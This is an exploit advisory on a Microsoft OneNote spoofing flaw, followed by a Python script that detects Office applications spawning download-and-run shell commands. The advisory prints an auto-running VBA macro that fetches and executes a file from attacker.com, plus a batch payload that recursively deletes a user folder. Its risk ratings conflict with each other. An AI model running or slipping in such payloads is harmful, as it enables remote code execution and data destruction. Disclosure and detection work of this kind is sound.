Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit Spoofing

2023.07.05
Credit: nu11secur1ty
Risk: Low
Local: No
Remote: Yes
CWE: N/A

## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected

## Description:
Microsoft OneNote is vulnerable to spoofing attacks. A malicious user can trick the victim into clicking a maliciously crafted URL, or into downloading some other malicious file and executing it. When this happens, the game will be over for the victim and his computer will be compromised.
Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker.

STATUS: HIGH Vulnerability

[+]Exploit:
```vbs
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub
```

[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)

## Time spent:
01:15:00
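A detection-side view of the macro above, as an added example that is not part of the original advisory: it scores process-creation events in which an Office application spawns a shell, and raises the score when the command line saves a file with curl and then runs it. The event field names follow Sysmon Event ID 1; the watch lists, sample events and the `example.invalid` host are constructed assumptions.

```python
import re
from ntpath import basename  # Windows path rules on any analysis host

# Assumed watch lists for this example; extend for your environment.
OFFICE_PARENTS = {"onenote.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# curl saving to a file via "> name" or "-o/--output name". The lookbehind also
# catches "/ccurl", which is what the macro's string concatenation produces.
DOWNLOAD = re.compile(
    r"(?:(?<=/c)|\b)curl(?:\.exe)?\b[^&|]*?"
    r"(?:>\s*|\s(?:-o|--output)\s+)(?P<out>[^\s&|\"]+)", re.I)
CHAIN = re.compile(r"&&|\|\||&")

def downloaded_then_run(cmdline):
    """Return the saved file name if a later chained command executes it."""
    m = DOWNLOAD.search(cmdline)
    if not m:
        return None
    out = basename(m.group("out")).lower()
    # Skip the first piece: it is the remainder of the curl command itself.
    for part in CHAIN.split(cmdline[m.end():])[1:]:
        tokens = part.split()
        if tokens and basename(tokens[0].strip('"')).lower() == out:
            return out
    return None

def classify(event):
    """Score one Sysmon-style process-creation event: 'high', 'medium' or None."""
    parent = basename(event["ParentImage"]).lower()
    child = basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return None
    return "high" if downloaded_then_run(event["CommandLine"]) else "medium"

# Constructed sample events (not captured telemetry).
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"ParentImage": OFFICE, "Image": CMD, "CommandLine":
     r'cmd.exe /S /ccurl -s https://example.invalid/p.bin > p.bin && .\p.bin'},
    {"ParentImage": OFFICE, "Image": CMD, "CommandLine": "cmd.exe /c ver"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": CMD, "CommandLine":
     "cmd.exe /c curl -s -o a.txt https://example.invalid/a.txt"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(classify(e), "|", e["CommandLine"])
```

The "medium" tier is deliberate: an Office process starting a shell at all is worth a look even when the command line does not match the download-and-run shape.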

